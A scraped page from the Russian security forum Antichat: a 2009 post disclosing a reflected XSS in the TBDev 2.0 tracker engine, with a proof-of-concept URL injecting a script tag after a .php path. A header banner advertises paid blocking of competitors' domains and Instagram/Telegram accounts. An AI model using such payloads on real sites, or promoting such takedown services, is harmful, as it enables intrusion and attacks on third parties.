FORUMS

LOG IN

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Трекер-движок TBDev 2.0

Опции темы

Поиск в этой теме

Опции просмотра

Предыдущая

Предыдущее сообщение

Следующее сообщение

Следующая

#31

Старый

06.05.2009, 01:06

Аватар для Rostov114

Rostov114

Познающий

Регистрация: 05.09.2008

Сообщений: 33

Провел на форуме:
95382

Репутация: 29

Отправить сообщение для Rostov114 с помощью ICQ

Отправить сообщение для Rostov114 с помощью AIM

Отправить сообщение для Rostov114 с помощью Yahoo

По умолчанию

Сегодня ищя в очередной раз дыры в TBDev заметил странную вещь если после имени файла добавить слеш (/) то весь дизайн перекосит...после 5 минут анализирования нашел активную XSS
Использование

Код:

http://torrent/xxx.php/"><script>alert(/XSS/)</script>/

Где xxx любой фаил двига который отображает что либо в дизайне.

Ответить с цитированием

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода	geforse	Мировые новости. Обсуждения.	1	14.07.2008 22:41
Web 2.0 выходит на государственный уровень	vadim399	Мировые новости. Обсуждения.	2	12.01.2008 18:06

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход